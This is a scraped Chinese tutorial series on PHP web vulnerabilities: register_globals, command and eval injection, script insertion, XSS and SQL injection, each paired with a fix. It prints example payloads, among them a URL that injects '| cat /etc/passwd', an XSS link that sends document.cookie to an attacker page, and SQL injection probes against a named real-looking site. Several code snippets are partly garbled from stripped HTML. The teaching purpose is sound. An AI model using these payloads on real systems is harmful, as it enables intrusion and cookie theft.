针对PHP 的网站主要存在下面几种攻击方式:

1、命令注入(Command Injection)2、eval 注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL 注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)7、Session 会话劫持(Session Hijacking)8、Session 固定攻击(Session Fixation)9、HTTP 响应拆分攻击(HTTP Response Splitting)10、文件上传漏洞(File Upload Attack)11、目录穿越漏洞(Directory Traversal)12、远程文件包含攻击(Remote Inclusion)13、动态函数注入攻击(Dynamic Variable Evaluation)14、URL 攻击(URL attack)15、表单提交欺骗攻击(Spoofed Form Submissions)16、HTTP 请求欺骗攻击(Spoofed HTTP Requests)

复制代码

以后的每期连载,会逐个介绍这些漏洞的原理和防御方法。

几个重要的php.ini 选项

Register Globals

php>=4.2.0,php.ini 的register_globals 选项的默认值预设为Off,当register_globals 的设定

为On 时,程序可以接收来自服务器的各种环境变量,包括表单提交的变量,而且由于PHP

不必事先初始化变量的值,从而导致很大的安全隐患。

例1:

//check_admin()用于检查当前用户权限,如果是admin 设置$is_admin 变量为true,然后下面

判断此变量是否为true,然后执行管理的一些操作

//ex1.php

复制代码

这一段代码没有将$is_admin 事先初始化为Flase,如果register_globals 为On,那么我们直

接提交

http://www.sectop.com/ex1.php?is_admin=true

,就可以绕过check_admin()的验证

例2:

//ex2.php

复制代码

当register_globals=On 时, 我们提交

http://www.sectop.com/ex2.php?_SESSION[username]=dodo,就具有了此用户的权限

所以不管register_globals 为什么,我们都要记住,对于任何传输的数据要经过仔细验证,变

量要初始化

safe_mode

安全模式,PHP 用来限制文档的存取、限制环境变量的存取,控制外部程序的执行。启用

安全模式必须设置php.ini 中的safe_mode = On

1、限制文件存取

safe_mode_include_dir = "/path1:/path2:/path3"

不同的文件夹用冒号隔开

2、限制环境变量的存取

safe_mode_allowed_env_vars = string

指定PHP 程序可以改变的环境变量的前缀,如:safe_mode_allowed_env_vars = PHP_ ,当这个

选项的值为空时,那么php 可以改变任何环境变量

safe_mode_protected_env_vars = string

用来指定php 程序不可改变的环境变量的前缀

3、限制外部程序的执行

safe_mode_exec_dir = string

此选项指定的文件夹路径影响system、exec、popen、passthru,不影响shell_exec 和“` `”。

disable_functions = string

不同的函数名称用逗号隔开,此选项不受安全模式影响

magic quotes

用来让php 程序的输入信息自动转义,所有的单引号(“'”),双引号(“"”),反斜杠(“\”)和空字

符(NULL),都自动被加上反斜杠进行转义

magic_quotes_gpc = On 用来设置magic quotes 为On,它会影响HTTP 请求的数据(GET、

POST、Cookies)

程序员也可以使用addslashes 来转义提交的HTTP 请求数据,或者用stripslashes 来删除转义

PHP 漏洞全解(二)-命令注入攻击

命令注入攻击

PHP 中可以使用下列5 个函数来执行外部的应用程序或函数

system、exec、passthru、shell_exec、``(与shell_exec 功能相同)

函数原型

string system(string command, int &return_var)command 要执行的命令return_var 存放执行命令的执行后的状态值string exec (string command, array &output, int &return_var)command 要执行的命令output 获得执行命令输出的每一行字符串return_var 存放执行命令后的状态值void passthru (string command, int &return_var)command 要执行的命令return_var 存放执行命令后的状态值string shell_exec (string command)command 要执行的命令

复制代码

漏洞实例

例1:

//ex1.php

<?php $dir = $_GET["dir"];if (isset($dir)){echo "

";system("ls -al ".$dir);echo "";}?>

复制代码

我们提交

http://www.sectop.com/ex1.php?dir=

| cat /etc/passwd

提交以后,命令变成了system("ls -al | cat /etc/passwd");

eval 注入攻击

eval 函数将输入的字符串参数当作PHP 程序代码来执行

函数原型:

mixed eval(string code_str) //eval 注入一般发生在攻击者能控制输入的字符串的时候

//ex2.php

复制代码

当我们提交

http://www.sectop.com/ex2.php?arg=phpinfo

();漏洞就产生了

动态函数

复制代码

程序员原意是想动态调用A 和B 函数, 那我们提交

http://www.sectop.com/ex.php?func=phpinfo 漏洞产生

防范方法

1、尽量不要执行外部命令

2、使用自定义函数或函数库来替代外部命令的功能

3、使用escapeshellarg 函数来处理命令参数

4、使用safe_mode_exec_dir 指定可执行文件的路径

esacpeshellarg 函数会将任何引起参数或命令结束的字符转义,单引号“'”,替换成“\'”,双引

号“"”,替换成“\"”,分号“;”替换成“\;”

用safe_mode_exec_dir 指定可执行文件的路径,可以把会使用的命令提前放入此路径内

safe_mode = On

safe_mode_exec_di r= /usr/local/php/bin/

PHP 漏洞全解(三)-客户端脚本植入

客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单、图片、动画或超链接

文字等对象内。当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击。

可以被用作脚本植入的HTML 标签一般包括以下几种:

1、

程序代码,也可以在src 属性内指定js 文件的URL 路径

2、标签标记的对象。这些对象是java applet、多媒体文件和ActiveX 控件等。通常

在data 属性内指定对象的URL 路径

3、标签标记的对象。这些对象是多媒体文件,例如:swf 文件。通常在src 属性内指

定对象的URL 路径

4、标签标记的对象。这些对象是java applet,通常在codebase 属性内指定对象的URL

路径

5、

标签标记的对象。通常在action 属性内指定要处理表单数据的web应用程序的URL

路径

客户端脚本植入的攻击步骤

1、攻击者注册普通用户后登陆网站

2、打开留言页面,插入攻击的js 代码

3、其他用户登录网站(包括管理员),浏览此留言的内容

4、隐藏在留言内容中的js 代码被执行,攻击成功

实例

数据库

CREATE TABLE `postmessage` (`id` int(11) NOT NULL auto_increment,`subject` varchar(60) NOT NULL default '',`name` varchar(40) NOT NULL default '',`email` varchar(25) NOT NULL default '',`question` mediumtext NOT NULL,`postdate` datetime NOT NULL default '0000-00-00 00:00:00',PRIMARY KEY (`id`)) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=' 使用者的留言'AUTO_INCREMENT=69 ;//add.php 插入留言//list.php 留言列表//show.php 显示留言

复制代码

程序和数据库打包下载地址

点我下载

提交下图的留言

浏览此留言的时候会执行js 脚本

插入 无限弹框

插入 跳转钓鱼页面

或者使用其他自行构造的js 代码进行攻击

防范的方法

一般使用htmlspecialchars 函数来将特殊字符转换成HTML 编码

函数原型

string htmlspecialchars (string string, int quote_style, string charset)

string 是要编码的字符串

quote_style 可选, 值可为ENT_COMPAT、ENT_QUOTES 、ENT_NOQUOTES ,默认值

ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES ,表示双引号和单引号都

要转换。ENT_NOQUOTES ,表示双引号和单引号都不转换

charset 可选,表示使用的字符集

函数会将下列特殊字符转换成html 编码:

& ----> &

" ----> "

' ----> '

< ----> <

> ----> >

把show.php 的第98 行改成

然后再查看插入js 的漏洞页面

PHP 漏洞全解(四)-xss 跨站脚本攻击

XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区

别,缩写为XSS

跨站脚本主要被攻击者利用来读取网站用户的cookies 或者其他个人数据,一旦攻击者得到

这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限。

跨站脚本攻击的一般步骤:

1、攻击者以某种方式发送xss 的http 链接给目标用户

2、目标用户登录此网站,在登陆期间打开了攻击者发送的xss 链接

3、网站执行了此xss 攻击脚本

4、目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息

5、攻击者使用目标用户的信息登录网站,完成攻击

当有存在跨站漏洞的程序出现的时候, 攻击者可以构造类似

http://www.sectop.com/search.php?key=

kie.php?cookie='+document.cookie; ,诱骗用户点击后,可以获取用户cookies 值

防范方法:

利用htmlspecialchars 函数将特殊字符转换成HTML 编码

函数原型

string htmlspecialchars (string string, int quote_style, string charset)

string 是要编码的字符串

quote_style 可选, 值可为ENT_COMPAT、ENT_QUOTES 、ENT_NOQUOTES ,默认值

ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES ,表示双引号和单引号都

要转换。ENT_NOQUOTES ,表示双引号和单引号都不转换

charset 可选,表示使用的字符集

函数会将下列特殊字符转换成html 编码:

& ----> &

" ----> "

' ----> '

< ----> <

> ----> >

$_SERVER["PHP_SELF"]变量的跨站

在某个表单中,如果提交参数给自己,会用这样的语句

" method="POST">

......

$_SERVER["PHP_SELF"]变量的值为当前页面名称

例:

http://www.sectop.com/get.php

get.php 中上述的表单

那么我们提交

http://www.sectop.com/get.php/">

那么表单变成

" method="POST">

跨站脚本被插进去了

防御方法还是使用htmlspecialchars 过滤输出的变量,或者提交给自身文件的表单使用

这样直接避免了$_SERVER["PHP_SELF"]变量被跨站

PHP 漏洞全解(五)-SQL 注入攻击

SQL 注入攻击(SQL Injection),是攻击者在表单中提交精心构造的sql 语句,改变原来的sql

语句,如果web 程序没有对提交的数据经过检查,那么就会造成sql 注入攻击。

SQL 注入攻击的一般步骤:

1、攻击者访问有SQL 注入漏洞的网站,寻找注入点

2、攻击者构造注入语句,注入语句和程序中的SQL 语句结合生成新的sql 语句

3、新的sql 语句被提交到数据库中进行处理

4、数据库执行了新的SQL 语句,引发SQL 注入攻击

实例

数据库

CREATE TABLE `postmessage` (`id` int(11) NOT NULL auto_increment,`subject` varchar(60) NOT NULL default '',`name` varchar(40) NOT NULL default '',`email` varchar(25) NOT NULL default '',`question` mediumtext NOT NULL,`postdate` datetime NOT NULL default '0000-00-00 00:00:00',PRIMARY KEY (`id`)) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=' 使用者的留言'AUTO_INCREMENT=69 ;grant all privileges on ch3.* to 'sectop'@localhost identified by '123456';//add.php 插入留言//list.php 留言列表//show.php 显示留言程序和数据库打包下载地

复制代码

点我下载

页面

http://www.netsos.com.cn/show.php?id=71

可能存在注入点,我们来测试

http://www.netsos.com.cn/show.php?id=71 and 1=1

返回页面

提交

http://www.netsos.com.cn/show.php?id=71

and 1=2

返回页面

一次查询到记录,一次没有,我们来看看源码

//show.php 12-15 行

// 执行mysql 查询语句

$query = "select * from postmessage where id = ".$_GET["id"];

$result = mysql_query($query)

or die("执行ySQL 查询语句失败:" . mysql_error());

参数id 传递进来后,和前面的字符串结合的sql 语句放入数据库进行查询

提交and 1=1,语句变成select * from postmessage where id = 71 and 1=1 这语句前值后值都

为真,and 以后也为真,返回查询到的数据

提交and 1=2,语句变成select * from postmessage where id = 71 and 1=2 这语句前值为真,

后值为假,and 以后为假,查询不到任何数据

正常的SQL 查询,经过我们构造的语句之后,形成了SQL 注入攻击。通过这个注入点,我

们还可以进一步拿到权限,比如说利用union 读取管理密码,读取数据库信息,或者用mysql

的load_file,into outfile 等函数进一步渗透。

防范方法

整型参数:

使用intval 函数将数据转换成整数

函数原型

int intval(mixed var, int base)

var 是要转换成整形的变量

base,可选,是基础数,默认是10

浮点型参数:

使用floatval 或doubleval 函数分别转换单精度和双精度浮点型参数

函数原型

int floatval(mixed var)

var 是要转换的变量

int doubleval(mixed var)

var 是要转换的变量

字符型参数:

使用addslashes 函数来将单引号“'”转换成“\'”,双引号“"”转换成“\"”,反斜杠“\”转换成“\\”,

NULL 字符加上反斜杠“\”

函数原型

string addslashes (string str)

str 是要检查的字符串

那么刚才出现的代码漏洞,我们可以这样修补

// 执行mysql 查询语句

$query = "select * from postmessage where id = ".intval($_GET["id"]);

$result = mysql_query($query)

or die("执行ySQL 查询语句失败:" . mysql_error());

如果是字符型,先判断magic_quotes_gpc 是否为On,当不为On 的时候使用addslashes 转义

特殊字符

if(get_magic_quotes_gpc()){$var = $_GET["var"];}else{$var = addslashes($_GET["var"]);}

复制代码

www.lthack.com php,[经验谈] PHP漏洞全解 ---文章转载自(十八哥,自学it网_公益IT培训)...相关推荐

  1. PHP漏洞全解(一)-PHP网站的安全性问题

    针对PHP的网站主要存在下面几种攻击方式: 1.命令注入(Command Injection) 2.eval注入(Eval Injection) 3.客户端脚本攻击(Script Insertion) ...

  2. PHP漏洞全解(二)-命令注入攻击

    命令注入攻击 PHP中可以使用下列5个函数来执行外部的应用程序或函数 system.exec.passthru.shell_exec.``(与shell_exec功能相同) 函数原型 string s ...

  3. php漏洞书籍,PHP漏洞全解(一)-PHP网站的安全性问题

    845002618491765410.jpg (163.16 KB, 下载次数: 58) 2015-11-13 14:40 上传 针对PHP的网站主要存在下面几种攻击方式: 1.命令注入(Comman ...

  4. 第30天-WEB 漏洞-RCE 代码及命令执行漏洞全解

    在 Web 应用中有时候程序员为了考虑灵活性.简洁性,会在代码调用代码或命令执行函数去处理.比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞.同样 ...

  5. 第31天:WEB漏洞~文件操作之文件包含漏洞全解

    目录 1. 文件包含漏洞 1.1. 原理.检测.类型.修复 1.2. 无限制&有限制的包含 1.2.1 本地包含 1.2.2 远程包含 1.3. 协议流 php:// php://input ...

  6. leetcode股票买卖问题全解(转载他人)

    RT(如题) 作者:labuladong 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iii/solutio ...

  7. jquery系列教程6-ajax的应用全解

    点击打开: jquery系列教程1-选择器全解 jquery系列教程2-style样式操作全解 jquery系列教程3-DOM操作全解 jquery系列教程4-事件操作全解 jquery系列教程5-动 ...

  8. Android 移动安全知识技术全解(加固技术、常规漏洞、Android 逆向......),移动安全问题不容忽视

    前言 您的设备是否处于遭受攻击.劫持或损害的风险中?毫无疑问.剑桥大学的研究人员发现,87% 的 Android 智能手机有至少一个严重漏洞,Zimperium Labs 在早些时候发现,黑客只需通过 ...

  9. android WebView详解,常见漏洞详解和安全源码(下)

    上篇博客主要分析了 WebView 的详细使用,这篇来分析 WebView 的常见漏洞和使用的坑.  上篇:android WebView详解,常见漏洞详解和安全源码(上)  转载请注明出处:http ...

  10. OWASP-TOP10漏洞详解以及防护方案

    OWASP TOP 10 漏洞详解以及防护方案 OWASP介绍 官网:http://www.owasp.org.cn/ OWASP TOP10 指出了 WEB 应用面临最大风险的 10 类问题,是目前 ...

最新文章

  1. python count()方法
  2. 递归删除N天前的文件夹及子文件夹下的特定文件
  3. ARM平台硬件时钟中断周期HZ值计算
  4. 零基础学编程学java还是python-学编程选Python还是Java?就业发展哪个好?
  5. MyEclipse 2014中 Window--customize perspective 功能 打不开的解决办法
  6. Linux下如何自己编译源代码(制作成可以安装的.deb文件)
  7. 微信小程序python解析获取用户手机号_python获取微信小程序openid及用户信息
  8. 小程序--计算正负数个数
  9. 5 呼吸灯verilog与Systemverilog编码
  10. OpenShift Security 15 - 用 RHACS 的安全策略管理运行中的容器安全
  11. 课程设计:大学生信息管理系统
  12. c#面向对象与程序设计第三版第三章例题代码_C#程序设计教程 | 教与学(教学大纲)...
  13. 小例子:在 ECharts 中实现日历图
  14. WordPress 后台评论如何自定义搜索条件
  15. Anroid camera + mediacodec
  16. TCP/IP模型各个层次的功能和协议
  17. Otsu‘s Thresholding的工作原理
  18. 反相高低频技术磨皮法
  19. 极光尔沃:太空3D打印机首次亮相 航天领域应用潜力巨大
  20. git squash 和 git rebase

热门文章

  1. 《地球信息科学学报》发表宋关福博士论文:当GIS遇到人工智能
  2. Ansheng的SRE学习之路-linux基础篇
  3. ERROR: Pool overlaps with other one on this address space 解决办法
  4. 1.4418不锈钢规范及使用环境详解
  5. Python Selenium自动化测试框架 Test Suite测试套件
  6. ThinkpadE450 Win8改Win7 BIOS设置图解
  7. 【读书笔记】《谈谈方法》(笛卡尔)
  8. EBS开发_应收发票接口导入
  9. WiFi、GNSS定位服务实战-OneOS位置服务组件(文末有礼品)
  10. 咸鱼的 Github 情报 | 一个支持边下边播、无版权限制和自动上传的BT离线下载程序...